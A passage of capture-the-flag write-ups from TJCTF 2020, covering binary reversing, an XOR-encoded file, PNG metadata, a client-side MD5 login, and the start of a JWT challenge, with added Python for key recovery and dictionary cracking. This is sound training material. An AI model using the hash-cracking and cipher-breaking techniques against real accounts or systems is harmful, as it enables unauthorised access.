<span class="nf">mov</span> <span class="p">[</span><span class="no">rbp</span><span class="err">+</span><span class="no">var_4</span><span class="p">],</span> <span class="mi">4</span>
<span class="nf">mov</span> <span class="no">eax</span><span class="p">,</span> <span class="p">[</span><span class="no">rbp</span><span class="err">+</span><span class="no">var_4</span><span class="p">]</span>
<span class="nf">pop</span> <span class="no">rbp</span>
<span class="nf">retn</span>
<span class="c1">; } // starts at 95A</span>
<span class="nf">eat_healthy</span> <span class="no">endp</span>
</code></pre></div>
<h2>do_pushup</h2>
<div class="highlight"><pre><span></span><code> <span class="nf">public</span> <span class="no">do_pushup</span>
<span class="nf">do_pushup</span> <span class="no">proc</span> <span class="no">near</span> <span class="c1">; CODE XREF: main+183↓p</span>
<span class="nf">var_14</span> <span class="err">=</span> <span class="no">dword</span> <span class="no">ptr</span> <span class="p">-</span><span class="mi">14</span><span class="no">h</span>
<span class="nf">var_4</span> <span class="err">=</span> <span class="no">dword</span> <span class="no">ptr</span> <span class="p">-</span><span class="mi">4</span>
<span class="c1">; __unwind {</span>
<span class="nf">push</span> <span class="no">rbp</span>
<span class="nf">mov</span> <span class="no">rbp</span><span class="p">,</span> <span class="no">rsp</span>
<span class="nf">mov</span> <span class="p">[</span><span class="no">rbp</span><span class="err">+</span><span class="no">var_14</span><span class="p">],</span> <span class="no">edi</span>
<span class="nf">mov</span> <span class="p">[</span><span class="no">rbp</span><span class="err">+</span><span class="no">var_4</span><span class="p">],</span> <span class="mi">1</span>
<span class="nf">mov</span> <span class="no">eax</span><span class="p">,</span> <span class="p">[</span><span class="no">rbp</span><span class="err">+</span><span class="no">var_4</span><span class="p">]</span>
<span class="nf">pop</span> <span class="no">rbp</span>
<span class="nf">retn</span>
<span class="c1">; } // starts at 96D</span>
<span class="nf">do_pushup</span> <span class="no">endp</span>
</code></pre></div>
<h2>go_run</h2>
<div class="highlight"><pre><span></span><code> <span class="nf">public</span> <span class="no">go_run</span>
<span class="nf">go_run</span> <span class="no">proc</span> <span class="no">near</span> <span class="c1">; CODE XREF: main+198↓p</span>
<span class="nf">var_14</span> <span class="err">=</span> <span class="no">dword</span> <span class="no">ptr</span> <span class="p">-</span><span class="mi">14</span><span class="no">h</span>
<span class="nf">var_4</span> <span class="err">=</span> <span class="no">dword</span> <span class="no">ptr</span> <span class="p">-</span><span class="mi">4</span>
<span class="c1">; __unwind {</span>
<span class="nf">push</span> <span class="no">rbp</span>
<span class="nf">mov</span> <span class="no">rbp</span><span class="p">,</span> <span class="no">rsp</span>
<span class="nf">mov</span> <span class="p">[</span><span class="no">rbp</span><span class="err">+</span><span class="no">var_14</span><span class="p">],</span> <span class="no">edi</span>
<span class="nf">mov</span> <span class="p">[</span><span class="no">rbp</span><span class="err">+</span><span class="no">var_4</span><span class="p">],</span> <span class="mi">2</span>
<span class="nf">mov</span> <span class="no">eax</span><span class="p">,</span> <span class="p">[</span><span class="no">rbp</span><span class="err">+</span><span class="no">var_4</span><span class="p">]</span>
<span class="nf">pop</span> <span class="no">rbp</span>
<span class="nf">retn</span>
<span class="c1">; } // starts at 980</span>
<span class="nf">go_run</span> <span class="no">endp</span>
</code></pre></div>
<h2>go_sleep</h2>
<div class="highlight"><pre><span></span><code> <span class="nf">public</span> <span class="no">go_sleep</span>
<span class="nf">go_sleep</span> <span class="no">proc</span> <span class="no">near</span> <span class="c1">; CODE XREF: main+1AB↓p</span>
<span class="nf">var_14</span> <span class="err">=</span> <span class="no">dword</span> <span class="no">ptr</span> <span class="p">-</span><span class="mi">14</span><span class="no">h</span>
<span class="nf">var_4</span> <span class="err">=</span> <span class="no">dword</span> <span class="no">ptr</span> <span class="p">-</span><span class="mi">4</span>
<span class="c1">; __unwind {</span>
<span class="nf">push</span> <span class="no">rbp</span>
<span class="nf">mov</span> <span class="no">rbp</span><span class="p">,</span> <span class="no">rsp</span>
<span class="nf">mov</span> <span class="p">[</span><span class="no">rbp</span><span class="err">+</span><span class="no">var_14</span><span class="p">],</span> <span class="no">edi</span>
<span class="nf">mov</span> <span class="p">[</span><span class="no">rbp</span><span class="err">+</span><span class="no">var_4</span><span class="p">],</span> <span class="mi">3</span>
<span class="nf">mov</span> <span class="no">eax</span><span class="p">,</span> <span class="p">[</span><span class="no">rbp</span><span class="err">+</span><span class="no">var_4</span><span class="p">]</span>
<span class="nf">pop</span> <span class="no">rbp</span>
<span class="nf">retn</span>
<span class="c1">; } // starts at 993</span>
<span class="nf">go_sleep</span> <span class="no">endp</span>
</code></pre></div>
<p>Nice! We know the value of each action:</p>
<table>
<thead>
<tr>
<th>Action</th>
<th>Value</th>
</tr>
</thead>
<tbody>
<tr>
<td>Eat healthy</td>
<td>4</td>
</tr>
<tr>
<td>Do 50 push-ups</td>
<td>1</td>
</tr>
<tr>
<td>Go for a run.</td>
<td>2</td>
</tr>
<tr>
<td>Sleep 8 hours.</td>
<td>3</td>
</tr>
</tbody>
</table>
<p>A quick check suggests the goal is impossible: the best action removes only 4 lbs and we have 7 days, so at most 7 * 4 = 28 lbs, short of the 31 we need.</p>
<p>Let's check how the <code>main</code> function is built:</p>
<div class="highlight"><pre><span></span><code><span class="kt">int</span> <span class="kr">__cdecl</span> <span class="nf">main</span><span class="p">(</span><span class="kt">int</span> <span class="n">argc</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span> <span class="o">**</span><span class="n">argv</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span> <span class="o">**</span><span class="n">envp</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">int</span> <span class="n">v3</span><span class="p">;</span> <span class="c1">// eax</span>
<span class="kt">signed</span> <span class="kt">int</span> <span class="n">v5</span><span class="p">;</span> <span class="c1">// [rsp+Ch] [rbp-A4h]</span>
<span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">i</span><span class="p">;</span> <span class="c1">// [rsp+10h] [rbp-A0h]</span>
<span class="kt">FILE</span> <span class="o">*</span><span class="n">stream</span><span class="p">;</span> <span class="c1">// [rsp+18h] [rbp-98h]</span>
<span class="kt">char</span> <span class="n">s</span><span class="p">;</span> <span class="c1">// [rsp+20h] [rbp-90h]</span>
<span class="kt">char</span> <span class="n">v9</span><span class="p">;</span> <span class="c1">// [rsp+60h] [rbp-50h]</span>
<span class="kt">unsigned</span> <span class="kr">__int64</span> <span class="n">v10</span><span class="p">;</span> <span class="c1">// [rsp+A8h] [rbp-8h]</span>
<span class="n">v10</span> <span class="o">=</span> <span class="n">__readfsqword</span><span class="p">(</span><span class="mh">0x28u</span><span class="p">);</span>
<span class="n">v5</span> <span class="o">=</span> <span class="mi">211</span><span class="p">;</span>
<span class="n">setbuf</span><span class="p">(</span><span class="n">stdout</span><span class="p">,</span> <span class="mi">0LL</span><span class="p">);</span>
<span class="n">setbuf</span><span class="p">(</span><span class="n">stdin</span><span class="p">,</span> <span class="mi">0LL</span><span class="p">);</span>
<span class="n">setbuf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="mi">0LL</span><span class="p">);</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"I'm currently %d lbs. Can I be exactly 180? Help me out!"</span><span class="p">,</span> <span class="mi">211LL</span><span class="p">);</span>
<span class="k">for</span> <span class="p">(</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span> <span class="p">(</span><span class="kt">signed</span> <span class="kt">int</span><span class="p">)</span><span class="n">i</span> <span class="o"><=</span> <span class="mi">7</span><span class="p">;</span> <span class="o">++</span><span class="n">i</span> <span class="p">)</span>
<span class="p">{</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"</span><span class="se">\n</span><span class="s">-------------------------"</span><span class="p">);</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"</span><span class="se">\n</span><span class="s">Today is day %d.</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">i</span><span class="p">);</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"</span><span class="se">\n</span><span class="s">Choose an activity:"</span><span class="p">);</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"</span><span class="se">\n</span><span class="s">[1] Eat healthy"</span><span class="p">);</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"</span><span class="se">\n</span><span class="s">[2] Do 50 push-ups"</span><span class="p">);</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"</span><span class="se">\n</span><span class="s">[3] Go for a run."</span><span class="p">);</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"</span><span class="se">\n</span><span class="s">[4] Sleep 8 hours."</span><span class="p">);</span>
<span class="n">puts</span><span class="p">(</span><span class="s">"</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="n">fgets</span><span class="p">(</span><span class="o">&</span><span class="n">s</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="n">stdin</span><span class="p">);</span>
<span class="n">v3</span> <span class="o">=</span> <span class="n">atoi</span><span class="p">(</span><span class="o">&</span><span class="n">s</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span> <span class="n">v3</span> <span class="o">==</span> <span class="mi">2</span> <span class="p">)</span>
<span class="p">{</span>
<span class="n">v5</span> <span class="o">-=</span> <span class="n">do_pushup</span><span class="p">(</span><span class="n">i</span><span class="p">,</span> <span class="mi">4LL</span><span class="p">);</span>
<span class="k">continue</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span> <span class="n">v3</span> <span class="o">></span> <span class="mi">2</span> <span class="p">)</span>
<span class="p">{</span>
<span class="k">if</span> <span class="p">(</span> <span class="n">v3</span> <span class="o">==</span> <span class="mi">3</span> <span class="p">)</span>
<span class="p">{</span>
<span class="n">v5</span> <span class="o">-=</span> <span class="n">go_run</span><span class="p">(</span><span class="n">i</span><span class="p">,</span> <span class="mi">4LL</span><span class="p">);</span>
<span class="nl">LABEL_12</span><span class="p">:</span>
<span class="n">v5</span> <span class="o">-=</span> <span class="n">go_sleep</span><span class="p">(</span><span class="n">i</span><span class="p">,</span> <span class="mi">4LL</span><span class="p">);</span>
<span class="k">continue</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span> <span class="n">v3</span> <span class="o">==</span> <span class="mi">4</span> <span class="p">)</span>
<span class="k">goto</span> <span class="n">LABEL_12</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">else</span> <span class="k">if</span> <span class="p">(</span> <span class="n">v3</span> <span class="o">==</span> <span class="mi">1</span> <span class="p">)</span>
<span class="p">{</span>
<span class="n">v5</span> <span class="o">-=</span> <span class="n">eat_healthy</span><span class="p">(</span><span class="n">i</span><span class="p">,</span> <span class="mi">4LL</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="n">sleep</span><span class="p">(</span><span class="mi">3u</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span> <span class="n">v5</span> <span class="o">==</span> <span class="mi">180</span> <span class="p">)</span>
<span class="p">{</span>
<span class="n">stream</span> <span class="o">=</span> <span class="n">fopen</span><span class="p">(</span><span class="s">"flag.txt"</span><span class="p">,</span> <span class="s">"r"</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span> <span class="o">!</span><span class="n">stream</span> <span class="p">)</span>
<span class="p">{</span>
<span class="n">puts</span><span class="p">(</span><span class="s">"Flag File is Missing. Contact a moderator if running on server."</span><span class="p">);</span>
<span class="n">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
<span class="p">}</span>
<span class="n">fgets</span><span class="p">(</span><span class="o">&</span><span class="n">v9</span><span class="p">,</span> <span class="mi">64</span><span class="p">,</span> <span class="n">stream</span><span class="p">);</span>
<span class="n">puts</span><span class="p">(</span><span class="s">"Congrats on reaching your weight goal!"</span><span class="p">);</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"Here is your prize: %s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="o">&</span><span class="n">v9</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">else</span>
<span class="p">{</span>
<span class="n">puts</span><span class="p">(</span><span class="s">"I didn't reach my goal :("</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div>
<p>Oh! We see something really nice:</p>
<div class="highlight"><pre><span></span><code> <span class="k">if</span> <span class="p">(</span> <span class="n">v3</span> <span class="o">==</span> <span class="mi">3</span> <span class="p">)</span>
<span class="p">{</span>
<span class="n">v5</span> <span class="o">-=</span> <span class="n">go_run</span><span class="p">(</span><span class="n">i</span><span class="p">,</span> <span class="mi">4LL</span><span class="p">);</span>
<span class="nl">LABEL_12</span><span class="p">:</span>
<span class="n">v5</span> <span class="o">-=</span> <span class="n">go_sleep</span><span class="p">(</span><span class="n">i</span><span class="p">,</span> <span class="mi">4LL</span><span class="p">);</span>
<span class="k">continue</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div>
<p>So, when we select action <code>3</code> (Go for a run), execution falls through into <code>LABEL_12</code> and the sleep is charged right after the run (a missing <code>break</code> in the original switch). We lose the weight for both the run and the sleep, 2 + 3 = 5 lbs per run.</p>
<p>We can reach exactly 31 with the pattern: Run, Run, Run, Run, Run, Sleep, Sleep (5 * 5 + 2 * 3 = 31).</p>
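<p>The loop rebuilt from the decompilation above, as an added example (this is not the challenge's own code, and the function names are mine). The case-3 fall-through is reproduced on purpose: brute-forcing all 4^7 plans with and without it shows that the bug is exactly what makes 31 lbs reachable, and the helper at the end builds the stdin the binary expects.</p>

```python
"""Gym loop reimplemented from the decompiled main() (added example, not the challenge's code)."""
from itertools import product
from typing import List, Optional

START, GOAL, DAYS = 211, 180, 7
LOSS = {"eat": 4, "pushup": 1, "run": 2, "sleep": 3}   # return values of the four functions


def simulate(choices: List[int], fallthrough: bool = True) -> int:
    """Feed menu numbers (1-4) to the loop and return the final weight."""
    weight = START
    for choice in choices[:DAYS]:
        if choice == 1:
            weight -= LOSS["eat"]
        elif choice == 2:
            weight -= LOSS["pushup"]
        elif choice == 3:
            weight -= LOSS["run"]
            if fallthrough:              # goto LABEL_12: the sleep is charged too
                weight -= LOSS["sleep"]
        elif choice == 4:
            weight -= LOSS["sleep"]
        # anything else (atoi of junk input) is a wasted day, as in the binary
    return weight


def best_loss(fallthrough: bool) -> int:
    """Largest weight loss over all 4**7 plans."""
    return START - min(simulate(list(p), fallthrough) for p in product(range(1, 5), repeat=DAYS))


def find_plan(fallthrough: bool = True) -> Optional[List[int]]:
    """First plan (in menu order) that lands exactly on GOAL, or None."""
    for plan in product(range(1, 5), repeat=DAYS):
        if simulate(list(plan), fallthrough) == GOAL:
            return list(plan)
    return None


def plan_to_stdin(plan: List[int]) -> bytes:
    """What to pipe into the program: one menu number per line (fgets reads at most 3 chars)."""
    return b"".join(b"%d\n" % c for c in plan)


if __name__ == "__main__":
    print("max loss without the bug:", best_loss(False))   # 28: target unreachable
    print("max loss with the bug:   ", best_loss(True))    # 35
    print("first plan that works:", find_plan())
    print("the write-up's plan ends at:", simulate([3, 3, 3, 3, 3, 4, 4]))
```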
<p>We input these choices and get back the flag: <code>tjctf{w3iGht_l055_i5_d1ff1CuLt}</code>.</p>TJCTF2020 - Hexillology2020-06-02T00:00:00+02:002020-06-02T00:00:00+02:00nlegalltag:blog.nlegall.fr,2020-06-02:/tjctf2020-hexillology.html<p><em>solves : 206</em></p>
<div class="highlight"><pre><span></span><code>Points: 25 points
Written by jpes707
I recently designed a new flag for my imaginary nation, Hexistan. Do you like it?
</code></pre></div>
<p><img alt="meme.png" src="https://blog.nlegall.fr/files/tjctf/2020/af83861c918131864a4e3df24c49d9bad766ae701f02387ee0698593b44f3390_Hexillology.png"></p>
<p>The name gives us a hint: <code>Hex</code>. The flag has 7 different colours. Reading the hex code of each colour in order and concatenating them gives: <code>746a6374667b70594a7266514b306462615450477d</code>.</p>
<p>We have a hex value and we can decode it with python:</p>
<div class="highlight"><pre><span></span><code><span class="o">>>></span> <span class="nb">bytes</span><span class="o">.</span><span class="n">fromhex</span><span class="p">(</span><span class="s1">'746a6374667b70594a7266514b306462615450477d'</span><span class="p">)</span><span class="o">.</span><span class="n">decode</span><span class="p">(</span><span class="s1">'utf-8'</span><span class="p">)</span>
<span class="s1">'tjctf</span><span class="si">{pYJrfQK0dbaTPG}</span><span class="s1">'</span>
</code></pre></div>TJCTF2020 - Is This Crypto?2020-06-02T00:00:00+02:002020-06-02T00:00:00+02:00nlegalltag:blog.nlegall.fr,2020-06-02:/tjctf2020-is-this-crypto.html<p><em>solves : 123</em></p>
<div class="highlight"><pre><span></span><code>Points: 50
Written by KyleForkBomb
Is this crypto?
Hint: The message is entirely printable characters
</code></pre></div>
<p><a href="https://blog.nlegall.fr/files/tjctf/2020/e141851decd4f7afab034c7055db229bd54011d2860ebd622302088fd4e062ae_file.txt">file.txt</a></p>
<p>We have a file with strange text inside:</p>
<div class="highlight"><pre><span></span><code>גפעהדפ±ע��
</code></pre></div>
<p>We have no clue about the file or the cipher used, so let's see if CyberChef's Magic operation can work it out:</p>
<p><img alt="isthiscrypto.png" src="https://blog.nlegall.fr/images/tjctf/2020/isthiscrypto.png"></p>
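<p>Magic works by trying candidate operations (XOR with short keys among them) and scoring the output. The same search by hand, driven by the hint that the message is entirely printable, as an added example that is not part of the original write-up: the sample text and the 3-byte key are constructed, and the real file's key is not stated on the page. The trick is that under a repeating key each key byte only touches its own column of the ciphertext, so the printable constraint can be checked per position (256 * keylen tests) instead of per key (256 ** keylen).</p>

```python
"""Repeating-key XOR recovery from the 'all printable' hint (added example, not the author's code)."""
import string
from typing import List, Optional

PRINTABLE = set(string.printable.encode())   # letters, digits, punctuation, whitespace
COMMON = set(b"etaoinshrdlu ETAOINSHRDLU")    # frequent English letters plus space


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR `data` with `key`, repeating the key as needed."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def candidate_key_bytes(ct: bytes, keylen: int) -> List[List[int]]:
    """For each key position, the key bytes that keep every ciphertext byte at that stride printable."""
    cands = []
    for pos in range(keylen):
        column = ct[pos::keylen]
        cands.append([k for k in range(256) if all((c ^ k) in PRINTABLE for c in column)])
    return cands


def english_score(text: bytes) -> float:
    """Fraction of bytes that are common English letters or space."""
    return sum(b in COMMON for b in text) / max(len(text), 1)


def recover_key(ct: bytes, max_keylen: int = 8) -> Optional[bytes]:
    """Try every key length; keep the key whose plaintext looks most English.
    Ties go to the shorter key (a length-2k key repeating a length-k key scores the same)."""
    best_score, best_key = -1.0, None
    for keylen in range(1, max_keylen + 1):
        cands = candidate_key_bytes(ct, keylen)
        if any(not c for c in cands):
            continue   # no key of this length keeps the whole message printable
        key = bytes(
            max(c, key=lambda k, p=pos: english_score(xor_bytes(ct[p::keylen], bytes([k]))))
            for pos, c in enumerate(cands)
        )
        score = english_score(xor_bytes(ct, key))
        if score > best_score:
            best_score, best_key = score, key
    return best_key


# Constructed sample: an English paragraph XORed with a made-up 3-byte key.
SAMPLE_KEY = b"K3y"
SAMPLE_PT = (b"The quick brown fox jumps over the lazy dog. A repeating-key XOR is not a "
             b"cipher you want to rely on: each key byte acts on its own column of the "
             b"message, so a hint such as 'the text is printable' leaks the key one byte at a time.")
SAMPLE_CT = xor_bytes(SAMPLE_PT, SAMPLE_KEY)

if __name__ == "__main__":
    key = recover_key(SAMPLE_CT)
    print("recovered key:", key)
    print(xor_bytes(SAMPLE_CT, key).decode())
```

The printable filter usually leaves several candidates per position (XOR with 0x01, for instance, maps letters to neighbouring letters), which is why a frequency score is still needed to pick the right one.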
<p>It detects XOR. Applying the suggested recipe decodes the file, and CyberChef gives us the clear text back:</p>
<div class="highlight"><pre><span></span><code>Cryptography is a discipline that has been around for quite a long time, but in recent times it has seen an explosion of research and implementation. This discipline seeks to provide secure communication and shared data storage using public key cryptography, which essentially reduces the damage that can be done through encryption.
tjctf{n0_th15_is_kyl3}
The Data Centre Standard for Confidentiality and Integrity states that a computer system must not contain any information that cannot be provided at the time of requesting it. The purpose of this standard is to ensure that no data from a connected computer system can be accessed by an unauthorised party. This would allow users to protect their data and make their personal information secure, which is more important than ever.
</code></pre></div>TJCTF2020 - Ling Ling2020-06-02T00:00:00+02:002020-06-02T00:00:00+02:00nlegalltag:blog.nlegall.fr,2020-06-02:/tjctf2020-ling-ling.html<p><em>solves : 529</em></p>
<div class="highlight"><pre><span></span><code>Points: 10
Written by KyleForkBomb
Who made this meme? I made this meme! unless.....
</code></pre></div>
<p><img alt="meme.png" src="https://blog.nlegall.fr/files/tjctf/2020/d25fe79e6276ed73a0f7009294e28c035437d7c7ffe2f46285e9eb5ac94b6bec_meme.png"></p>
<p>We have an image. As usual, run <code>exiftool</code> to dump all the metadata the file contains:</p>
<div class="highlight"><pre><span></span><code>╰─ exiftool d25fe79e6276ed73a0f7009294e28c035437d7c7ffe2f46285e9eb5ac94b6bec_meme.png
ExifTool Version Number : <span class="m">11</span>.85
File Name : d25fe79e6276ed73a0f7009294e28c035437d7c7ffe2f46285e9eb5ac94b6bec_meme.png
<span class="o">[</span>...<span class="o">]</span>
Artist : tjctf<span class="o">{</span>ch0p1n_fl4gs<span class="o">}</span>
Y Cb Cr Positioning : Centered
Image Size : 623x890
Megapixels : <span class="m">0</span>.554
</code></pre></div>
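<p>exiftool reads that value from the PNG's metadata chunks (<code>tEXt</code>, <code>zTXt</code> and <code>iTXt</code> text chunks, or an embedded EXIF block in an <code>eXIf</code> chunk). A minimal chunk walker that verifies the CRCs and pulls the text metadata out, as an added example that is not part of the original post; the PNG it parses is constructed in memory and is not the challenge image.</p>

```python
"""PNG chunk walker that extracts text metadata (added example, not the author's code)."""
import struct
import zlib
from typing import Dict, Iterator, Tuple

PNG_SIG = b"\x89PNG\r\n\x1a\n"


def make_chunk(ctype: bytes, body: bytes) -> bytes:
    """length | type | body | CRC32 over type+body, all big-endian."""
    crc = zlib.crc32(ctype + body) & 0xFFFFFFFF
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)


def iter_chunks(data: bytes) -> Iterator[Tuple[bytes, bytes]]:
    """Yield (type, body) for each chunk, checking every CRC; stop at IEND."""
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG (bad signature)")
    off = len(PNG_SIG)
    while off + 12 <= len(data):
        length, ctype = struct.unpack(">I4s", data[off:off + 8])
        if off + 12 + length > len(data):
            raise ValueError(f"chunk {ctype!r} at {off} runs past end of file")
        body = data[off + 8:off + 8 + length]
        (crc,) = struct.unpack(">I", data[off + 8 + length:off + 12 + length])
        if zlib.crc32(ctype + body) & 0xFFFFFFFF != crc:
            raise ValueError(f"bad CRC on chunk {ctype!r} at {off}")
        yield ctype, body
        off += 12 + length
        if ctype == b"IEND":
            return
    raise ValueError("truncated PNG (no IEND)")


def text_metadata(data: bytes) -> Dict[str, str]:
    """keyword -> text for the three text chunk types; notes an eXIf chunk if present."""
    meta: Dict[str, str] = {}
    for ctype, body in iter_chunks(data):
        if ctype == b"tEXt":                      # keyword\0text (latin-1)
            key, _, text = body.partition(b"\x00")
            meta[key.decode("latin-1")] = text.decode("latin-1")
        elif ctype == b"zTXt":                    # keyword\0 method(1) zlib(text)
            key, _, rest = body.partition(b"\x00")
            meta[key.decode("latin-1")] = zlib.decompress(rest[1:]).decode("latin-1")
        elif ctype == b"iTXt":                    # keyword\0 flag(1) method(1) lang\0 tkey\0 text(utf-8)
            key, _, rest = body.partition(b"\x00")
            comp_flag, rest = rest[0], rest[2:]
            _lang, _, rest = rest.partition(b"\x00")
            _tkey, _, text = rest.partition(b"\x00")
            meta[key.decode("latin-1")] = (zlib.decompress(text) if comp_flag else text).decode("utf-8")
        elif ctype == b"eXIf":
            meta["(eXIf chunk)"] = f"{len(body)} bytes of EXIF data"
    return meta


def is_valid_png(data: bytes) -> bool:
    """True when the signature and every chunk CRC check out."""
    try:
        for _ in iter_chunks(data):
            pass
        return True
    except ValueError:
        return False


def sample_png() -> bytes:
    """Constructed 1x1 RGB PNG carrying an Artist tEXt, a zTXt and an iTXt chunk."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)         # 1x1, 8-bit, colour type 2 (RGB)
    scanline = b"\x00" + b"\xff\x00\x00"                          # filter byte + one red pixel
    return (PNG_SIG
            + make_chunk(b"IHDR", ihdr)
            + make_chunk(b"tEXt", b"Artist\x00flag{constructed}")
            + make_chunk(b"zTXt", b"Comment\x00\x00" + zlib.compress(b"compressed text works too"))
            + make_chunk(b"iTXt", b"Title\x00\x00\x00\x00\x00" + "itxt text".encode("utf-8"))
            + make_chunk(b"IDAT", zlib.compress(scanline))
            + make_chunk(b"IEND", b""))


if __name__ == "__main__":
    for key, value in text_metadata(sample_png()).items():
        print(f"{key:12}: {value}")
```

A flipped CRC byte is enough to make <code>is_valid_png()</code> reject the file, which is also a quick way to tell whether a CTF image has been edited by hand rather than by a tool.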
<p>An easy one: the flag sits in plaintext in the <code>Artist</code> tag: <code>tjctf{ch0p1n_fl4gs}</code>.</p>TJCTF2020 - Login2020-06-02T00:00:00+02:002020-06-02T00:00:00+02:00nlegalltag:blog.nlegall.fr,2020-06-02:/tjctf2020-login.html<p><em>solves : 674</em></p>
<div class="highlight"><pre><span></span><code>Points: 30
Written by saisree
Could you login into this very secure site? Best of luck!
</code></pre></div>
<p>We have a standard login page with some JS code inside to perform the login:</p>
<p><img alt="login1.png" src="https://blog.nlegall.fr/images/tjctf/2020/login1.png"></p>
<p>It contains a hash: <code>c2a094f7d35f2299b414b6a1b3bd595a</code>. Let's try it with <a href="https://crackstation.net/">crackstation</a>: it identifies it as MD5 and gives us back the clear password: <code>inevitable</code>.</p>
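<p>Comparing a password hash in the browser means shipping the hash to every visitor, and an unsalted MD5 falls to a plain dictionary attack. The offline equivalent of crackstation, as an added example that is not part of the original write-up: the wordlist and the mangling rules are constructed, and <code>PAGE_HASH</code> is the value found in the login page's JavaScript.</p>

```python
"""Dictionary attack on an unsalted MD5 (added example, not the challenge's code)."""
import hashlib
from typing import Iterable, Iterator, Optional

PAGE_HASH = "c2a094f7d35f2299b414b6a1b3bd595a"   # hash embedded in the page's JS


def md5_hex(word: str) -> str:
    return hashlib.md5(word.encode()).hexdigest()


def mangle(words: Iterable[str]) -> Iterator[str]:
    """Cheap rule set: the word itself, capitalised, upper-cased, each with 0-2 digits appended."""
    for word in words:
        for base in (word, word.capitalize(), word.upper()):
            yield base
            for n in range(100):
                yield f"{base}{n}"


def crack_md5(target: str, candidates: Iterable[str]) -> Optional[str]:
    """First candidate whose MD5 equals `target`, else None.
    MD5 is fast and there is no salt, so this scales to millions of guesses per second."""
    target = target.lower()
    for cand in candidates:
        if md5_hex(cand) == target:
            return cand
    return None


WORDLIST = ["password", "letmein", "qwerty", "inevitable", "admin"]   # constructed

if __name__ == "__main__":
    print("page hash cracks to:", crack_md5(PAGE_HASH, mangle(WORDLIST)))
```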
<p>We can now log in as admin with this password, and the next page shows the flag: <code>tjctf{inevitable890898}</code>.</p>TJCTF2020 - Moar Horse 42020-06-02T00:00:00+02:002020-06-02T00:00:00+02:00nlegalltag:blog.nlegall.fr,2020-06-02:/tjctf2020-moar-horse-4.html<p><em>solves : 78</em></p>
<div class="highlight"><pre><span></span><code>Points: 80
Written by nthistle
It seems like the TJCTF organizers are secretly running an underground virtual horse racing platform! They call it 'Moar Horse 4'... See if you can get a flag from it!
Source
</code></pre></div>
<p><a href="https://blog.nlegall.fr/files/tjctf/2020/49bf39e0f4815da8cc806f26306d5d6f629b2306ad14ae20fb03b7195e05622e_server.zip">server.zip</a></p>
<p>Since we have the source, let's take a look into it:</p>
<div class="highlight"><pre><span></span><code>╰─ tree
.
├── horse_names.txt
├── pubkey.pem
├── server.py
├── static
│ ├── css
│ │ └── style.css
│ └── images
│ ├── horse.png
│ └── mechahorse.png
└── templates
├── main.html
├── new_user.html
├── race.html
├── race_results.html
└── store.html
<span class="m">4</span> directories, <span class="m">11</span> files
</code></pre></div>
<p>We can extract some information from the file <code>server.py</code>:</p>
<ul>
<li>We have a horse name: <code>BOSS_HORSE = "MechaOmkar-YG6BPRJM"</code></li>
<li><code>token = jwt.encode(data, PRIVATE_KEY, "RS256")</code> : the website uses JWT tokens signed with the RS256 algorithm</li>
<li><code>your_speed = int(hashlib.md5(("Horse_" + race_horse).encode()).hexdigest(), 16)</code> : how the speed of a horse is computed</li>
</ul>
<p>Let's take a closer look at this line:</p>
<div class="highlight"><pre><span></span><code><span class="n">your_speed</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">hashlib</span><span class="o">.</span><span class="n">md5</span><span class="p">((</span><span class="s2">"Horse_"</span> <span class="o">+</span> <span class="n">race_horse</span><span class="p">)</span><span class="o">.</span><span class="n">encode</span><span class="p">())</span><span class="o">.</span><span class="n">hexdigest</span><span class="p">(),</span> <span class="mi">16</span><span class="p">)</span>
</code></pre></div>
<p>First, the horse name is appended to the string <code>Horse_</code>. Then Python encodes the result to bytes before hashing it with MD5. Finally, the hexadecimal digest is converted to an int (base 16).</p>
<p>We can compute the target speed to beat, since we know the boss's horse name:</p>
<div class="highlight"><pre><span></span><code><span class="o">>>></span> <span class="nb">int</span><span class="p">(</span><span class="n">hashlib</span><span class="o">.</span><span class="n">md5</span><span class="p">((</span><span class="s2">"Horse_MechaOmkar-YG6BPRJM"</span><span class="p">)</span><span class="o">.</span><span class="n">encode</span><span class="p">())</span><span class="o">.</span><span class="n">hexdigest</span><span class="p">(),</span> <span class="mi">16</span><span class="p">)</span>
<span class="mi">340282329007027273925800828829408515216</span>
</code></pre></div>
<p>Quite a rapid horse!</p>
<p>Ok, let's visit the website and get a valid JWT token. We can edit it with <a href="https://github.com/ticarpi/jwt_tool">jwt_tool</a>.</p>
